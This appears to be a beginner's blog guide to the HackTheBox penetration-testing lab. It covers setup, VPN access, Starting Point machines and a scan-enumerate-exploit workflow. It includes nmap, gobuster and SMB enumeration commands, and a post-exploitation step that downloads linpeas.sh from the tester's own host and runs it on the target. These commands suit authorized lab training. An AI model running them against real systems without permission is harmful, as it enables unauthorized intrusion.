HackTheBox (HTB) is the most popular platform for hands-on penetration testing practice. With hundreds of machines ranging from beginner to insane difficulty, HTB has become the de facto training ground for security professionals preparing for certifications like OSCP, eCPPT, and CRTO. If you’re new to the platform, this guide walks you through everything you need to get started.
Creating Your Account
Visit hackthebox.com and register. The free tier gives you access to:
- Starting Point machines (guided beginner labs)
- 2 active free machines at a time (from the retired pool on VIP)
- Community write-ups for retired machines
VIP subscription (~$14/month) unlocks all retired machines, faster VPN servers, and exclusive machines — well worth it once you’re ready to practice consistently.
Setting Up Your Environment
Install Kali Linux or ParrotOS
HackTheBox is best approached from a dedicated pentesting VM:
# Download Kali from kali.org
# Set up VirtualBox or VMware with at least:
# - 4GB RAM (8GB recommended)
# - 50GB storage
# - 2 CPU cores
Connect to HTB VPN
Download your VPN configuration from HTB:
- Profile → Access → Download VPN config
- Choose Starting Point, Machines, or Labs pack
- Connect:
sudo openvpn ~/Downloads/your_config.ovpn
Verify connection:
ping 10.10.10.1 # HTB gateway
Keep the VPN terminal open and work in another terminal.
Starting Point: Your First Machines
HTB’s Starting Point machines are specifically designed for beginners. They’re guided with tasks that teach one skill at a time.
Tier 0 Machines (Absolute Basics)
- Meow — Telnet enumeration
- Fawn — FTP anonymous login
- Dancing — SMB enumeration with smbclient
- Redeemer — Redis unauthenticated access
These teach the fundamental workflow: scan → enumerate → exploit → capture flag.
- Appointment — SQL injection
- Sequel — MySQL enumeration
- Crocodile — FTP + web login
- Responder — LLMNR poisoning
- Three — S3 bucket misconfiguration
Complete all Starting Point machines before moving to the main box pool.
Core Methodology (The HTB Approach)
Every machine follows a similar workflow:
1. Reconnaissance
# Initial port scan — fast, all ports
sudo nmap -sS -p- --min-rate 5000 TARGET_IP -o nmap_allports.txt
# Service version scan on open ports
sudo nmap -sV -sC -p 22,80,443 TARGET_IP -o nmap_services.txt
2. Enumeration
Based on what ports are open:
# HTTP/HTTPS
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
nikto -h http://TARGET_IP
whatweb http://TARGET_IP
# SMB
enum4linux -a TARGET_IP
smbclient -L //TARGET_IP -N
# FTP
ftp TARGET_IP # Try anonymous / anonymous
# SSH
ssh user@TARGET_IP # Note version from nmap for known CVEs
3. Exploitation
Based on findings, research and exploit:
- Google the exact version of software found for known CVEs
- Check Exploit-DB:
searchsploit apache 2.4.49
- Look for default credentials
- Test web apps for SQLi, XSS, file upload, LFI/RFI
4. Post-Exploitation
# User flag
find / -name user.txt 2>/dev/null
cat /home/*/user.txt
# Privilege escalation
wget http://YOUR_IP/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
# Root flag
cat /root/root.txt
Recommended Easy Linux Machines (2026)
Start with retired machines (VIP) that have abundant write-ups:
| Machine | Key Skill |
|---|
| Lame | Samba CVE exploitation |
| Legacy | MS08-067 with Metasploit |
| Blue | EternalBlue (MS17-010) |
| Jerry | Apache Tomcat default creds |
| Bashed | phpbash webshell |
| Nibbles | Nibbleblog file upload RCE |
| Shocker | Shellshock |
Using Write-ups Ethically
Write-ups exist for all retired machines. The most effective approach:
- Attempt for at least 30-60 minutes before looking at hints
- Use hints from Discord/forums first (HTB has an official Discord)
- Read the write-up after solving to understand what you missed
- Never look at write-ups for active machines — violates HTB terms of service
Essential Resources
- IppSec YouTube — Video walkthroughs of retired HTB machines; the best learning resource on the platform
- HTB Discord — Official server with hints and community support
- HackTricks (book.hacktricks.xyz) — Comprehensive pentesting reference
- GTFOBins — Unix binary privilege escalation
- Exploit-DB — CVE database and PoC exploits
Tracking Progress
The HTB ranking system uses Hack Points and Owns. Getting “first blood” (first to solve a machine) earns extra points. Track your methodology notes — tools like Obsidian or CherryTree work well for organized pentesting notes.
HTB is genuinely the best hands-on platform for practical security learning. Commit to solving two machines per week, and within three months you’ll have the skills to attempt the OSCP exam.